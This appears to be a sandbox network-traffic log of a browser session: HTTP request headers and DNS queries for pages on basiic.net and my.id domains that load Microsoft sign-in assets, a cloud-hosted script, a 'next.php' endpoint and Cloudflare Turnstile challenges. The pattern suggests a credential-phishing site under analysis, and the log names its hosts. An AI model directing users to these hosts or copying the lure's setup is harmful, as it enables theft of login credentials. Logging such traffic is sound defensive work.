    Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 5102487645-1323985617.cos.eu-frankfurt.myqcloud.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /next.php HTTP/1.1Host: 5102487645.my.idConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /yKKWd/bootstrap.min.css.map HTTP/1.1Host: apeidieppe-d.basiic.netConnection: keep-aliveSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=4ghhpb396a5ubs4qoebu2iv728
    Source: global trafficHTTP traffic detected: GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://apeidieppe-d.basiic.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ests/2.1/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /next.php HTTP/1.1Host: 5102487645.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 5102487645.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://5102487645.my.id/next.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 5102487645.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://5102487645.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/f2bbd6738e15/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://5102487645.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://5102487645.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=gMNfPcGdfAFaFbr&MD=Wr9+2x7V HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a100ceca7e7db&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a100ceca7e7db&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv1/bpy9ZfXXCgwSaYHz/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://5102487645.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv1/bpy9ZfXXCgwSaYHz/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://5102487645.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a109478696b9a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv1/bpy9ZfXXCgwSaYHz/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a109478696b9a&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv2/-VbzSdWhMfLGjLct/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://5102487645.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a10f63a046c33&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv2/-VbzSdWhMfLGjLct/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a10f63a046c33&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv3/ft_4y_PuFbfD3r8D/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://5102487645.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv3/ft_4y_PuFbfD3r8D/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://5102487645.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a11797f676b79&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv3/ft_4y_PuFbfD3r8D/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /next.php HTTP/1.1Host: 5102487645.my.idConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=69f617384d08c6c83f3a20d1d5f3410a
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a11797f676b79&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /next.php HTTP/1.1Host: 5102487645.my.idConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=69f617384d08c6c83f3a20d1d5f3410a
    Source: global trafficHTTP traffic detected: GET /next.php HTTP/1.1Host: 5102487645.my.idConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=69f617384d08c6c83f3a20d1d5f3410a
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv4/3XIyTgfM2rEpHtYU/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://5102487645.my.id/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8d6a11d74de3e83b&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv4/3XIyTgfM2rEpHtYU/nu8l3/0x4AAAAAAAgk0nqtAQ4g0A4d/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: apeidieppe-d.basiic.net
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
    Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
    Source: global trafficDNS traffic detected: DNS query: 5102487645-1323985617.cos.eu-frankfurt.myqcloud.com
    Source: global trafficDNS traffic detected: DNS query: 5102487645.my.id
    Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1571854637:1729602840:zvAtmTzhVMvcARSqZmG29O5V7h_Ph-feXgeguOMcDwY/8d6a0f0a98ece91e/bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU. HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3383sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: bPN.remb.Z21oUkjCBQn607MW.5p7.j.runcpLO0s2k-1729606099-1.1.1.1-FxUbwo9qxrp3t45.o_DKYNcB3r6oK8pT8DAgKZ3z4VycwCeNNToDarphnbHVhIU.sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/7007c/0x4AAAAAAAxiX9jZ_UpA8p2c/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
